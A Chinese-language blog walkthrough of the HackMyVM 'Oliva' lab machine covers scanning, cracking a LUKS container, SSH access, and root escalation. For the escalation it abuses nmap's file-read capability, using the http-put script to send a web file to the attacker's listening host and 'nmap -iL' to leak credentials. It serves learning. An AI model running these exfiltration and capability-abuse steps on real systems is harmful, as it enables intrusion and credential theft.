hmv[-_-]Oliva

Oliva

image-20240421153802801

image-20240421154000423

信息搜集

端口扫描

rustscan -a 192.168.0.104 -- -A

Open 192.168.0.104:80
Open 192.168.0.104:22

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 6d:84:71:14:03:7d:7e:c8:6f:dd:24:92:a8:8e:f7:e9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKq/kHQkF02bmDYzOAD/qpiCHDR97iXI1oNT4/xeNcpIBmtOTI1NEY8dzAmGqpviQswx99Xc1WUXCJG5NUgf8bE=
|   256 d8:5e:39:87:9e:a1:a6:75:9a:28:78:ce:84:f7:05:7a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDERBi20HARO1lSqDbLVqQPspJ1HJA1KDXGblcp9T/cN
80/tcp open  http    syn-ack nginx 1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

┌──(kali💀kali)-[~/temp/Oliva]
└─$ gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.104/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,zip,git,jpg,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 69]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

image-20240421154201850

敏感目录

http://192.168.0.104/index.php
Hi oliva, Here the pass to obtain root: CLICK!

下载一下他给的文件:

┌──(kali💀kali)-[~/temp/Oliva]
└─$ wget http://192.168.0.104/oliva                                             
--2024-04-21 03:43:52--  http://192.168.0.104/oliva
Connecting to 192.168.0.104:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20000000 (19M) [application/octet-stream]
Saving to: ‘oliva’

oliva                                 100%[=========================================================================>]  19.07M  --.-KB/s    in 0.07s   

2024-04-21 03:43:52 (257 MB/s) - ‘oliva’ saved [20000000/20000000]

┌──(kali💀kali)-[~/temp/Oliva]
└─$ ls -la
total 19540
drwxr-xr-x  2 kali kali     4096 Apr 21 03:43 .
drwxr-xr-x 56 kali kali     4096 Apr 21 03:39 ..
-rw-r--r--  1 kali kali 20000000 Jul  4  2023 oliva

┌──(kali💀kali)-[~/temp/Oliva]
└─$ file oliva   
oliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse

查一下这是个啥:

LUKS (Linux Unified Key Setup) 是一种用于Linux和其他类Unix操作系统中的全盘加密标准。它为存储设备(如硬盘分区、固态硬盘或USB驱动器)提供了透明的、基于密码的加密机制。

  • 初始化加密分区:cryptsetup luksFormat /dev/device --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000
  • 打开(即挂载)加密分区:cryptsetup open /dev/device myencryptedvolume
  • 在打开的加密设备上创建并格式化文件系统:mkfs.ext4 /dev/mapper/myencryptedvolume
  • 挂载文件系统供正常使用:mount /dev/mapper/myencryptedvolume /mnt/secure
  • 关闭(即卸载)加密分区:cryptsetup close myencryptedvolume

image-20240421154837770

爆破LUKS

┌──(kali💀kali)-[~/temp/Oliva]
└─$ chmod +x oliva        

┌──(kali💀kali)-[~/temp/Oliva]
└─$ bruteforce-luks -t 4 -f /usr/share/wordlists/rockyou.txt -v 10 oliva
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 0
Tried passwords per second: 0.000000
Last tried password: password

^C

啊这。。。。

我直接看别人的wp了,这个可能是我这边的环境配置有点问题:

Password found: bebita

然后打开文件:

cryptsetup luksOpen oliva temp
bebita
cd /dev/mapper/
ls -la
mount /dev/mapper/temp /mnt
cd /mnt
cat mypass.txt
# Yesthatsmypass!

ssh连接

image-20240421170159924

提权

信息搜集

oliva@oliva:~$ ls -la
total 32
drwx------ 3 oliva oliva 4096 jul  4  2023 .
drwxr-xr-x 3 root  root  4096 jul  4  2023 ..
lrwxrwxrwx 1 oliva oliva    9 jul  4  2023 .bash_history -> /dev/null
-rw-r--r-- 1 oliva oliva  220 jul  4  2023 .bash_logout
-rw-r--r-- 1 oliva oliva 3526 jul  4  2023 .bashrc
drwxr-xr-x 3 oliva oliva 4096 jul  4  2023 .local
-rw-r--r-- 1 oliva oliva  807 jul  4  2023 .profile
-rw------- 1 oliva oliva   24 jul  4  2023 user.txt
-rw------- 1 oliva oliva  102 jul  4  2023 .Xauthority
oliva@oliva:~$ cat user.txt 
HMVY0H8NgGJqbFzbgo0VMRm
oliva@oliva:~$ sudo -l
-bash: sudo: orden no encontrada
oliva@oliva:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
oliva@oliva:~$ /usr/sbin/getcap / 2>/dev/null
oliva@oliva:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep

nmap读取数据库密码

nmap阔以读取文件。

参考一下:https://gtfobins.github.io/gtfobins/nmap/#file-upload

继续查看一下是否开启了相关服务:

oliva@oliva:~$ ss -tnlup
Netid          State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process          
udp            UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*                             
tcp            LISTEN          0               80                           127.0.0.1:3306                        0.0.0.0:*                             
tcp            LISTEN          0               511                            0.0.0.0:80                          0.0.0.0:*                             
tcp            LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*                             
tcp            LISTEN          0               511                               [::]:80                             [::]:*                             
tcp            LISTEN          0               128                               [::]:22                             [::]:*  

开启了数据库。

使用gtfobins的方案:

┌──(kali💀kali)-[~]
└─$ socat -v tcp-listen:8080,reuseaddr,fork -
2024/04/21 05:12:51 socat[19458] E read(6, 0x55c8d32e0000, 8192): Connection reset by peer
> 2024/04/21 05:12:51.000584590  length=331 from=0 to=330
PUT / HTTP/1.1\r
Content-Length: 163\r
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\r
Connection: close\r
Host: kali:8080\r
\r
Hi oliva,
Here the pass to obtain root:

<?php
$dbname = 'easy';
$dbuser = 'root';
$dbpass = 'Savingmypass';
$dbhost = 'localhost';
?>

<a href="oliva">CLICK!</a>
PUT / HTTP/1.1
Content-Length: 163
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Host: kali:8080

Hi oliva,
Here the pass to obtain root:

<?php
$dbname = 'easy';
$dbuser = 'root';
$dbpass = 'Savingmypass';
$dbhost = 'localhost';
?>

<a href="oliva">CLICK!</a>
^C                
oliva@oliva:~$ nmap -p 8080 192.168.0.143 --script http-put --script-args http-put.url=/,http-put.file=/var/www/html/index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-21 11:12 CEST
Nmap scan report for kali (192.168.0.143)
Host is up (0.00091s latency).

PORT     STATE SERVICE
8080/tcp open  http-proxy
|_http-put: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 4.41 seconds

或者使用以下方案:

oliva@oliva:~$ cd /var/www/html
oliva@oliva:/var/www/html$ ls -la
total 19548
drwxr-xr-x 2 root     root         4096 jul  4  2023 .
drwxr-xr-x 3 root     root         4096 jul  4  2023 ..
-rw-rw---- 1 www-data www-data      615 jul  4  2023 index.html
-rw-rw---- 1 www-data www-data      163 jul  4  2023 index.php
-rw-rw---- 1 www-data www-data 20000000 jul  4  2023 oliva
oliva@oliva:/var/www/html$ cat index.php
cat: index.php: Permiso denegado
oliva@oliva:/var/www/html$ nmap -iL index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-21 11:07 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.68 seconds

找到了数据库密码!

root
Savingmypass

读取数据库提权

然后读取数据库:

oliva@oliva:~$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.11.3-MariaDB-1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| easy               |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0,067 sec)

MariaDB [(none)]> use easy;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [easy]> show tables;
+----------------+
| Tables_in_easy |
+----------------+
| logging        |
+----------------+
1 row in set (0,000 sec)

MariaDB [easy]> select * from logging;
+--------+------+--------------+
| id_log | uzer | pazz         |
+--------+------+--------------+
|      1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,026 sec)

MariaDB [easy]> exit
Bye

尝试登录,发现成功!

oliva@oliva:~$ su root
Contraseña: 
root@oliva:/home/oliva# cd /root
root@oliva:~# ls -la
total 32
drwx------  4 root root 4096 jul  4  2023 .
drwxr-xr-x 18 root root 4096 jul  4  2023 ..
lrwxrwxrwx  1 root root    9 jul  4  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 abr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 jul  4  2023 .local
-rw-------  1 root root  567 jul  4  2023 .mysql_history
-rw-r--r--  1 root root  161 jul  9  2019 .profile
-rw-------  1 root root   24 jul  4  2023 rutflag.txt
drwx------  2 root root 4096 jul  4  2023 .ssh
root@oliva:~# cat rutflag.txt 
HMVnuTkm4MwFQNPmMJHRyW7
root@oliva:~# cd .ssh/
root@oliva:~/.ssh# ls -la
total 8
drwx------ 2 root root 4096 jul  4  2023 .
drwx------ 4 root root 4096 jul  4  2023 ..
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇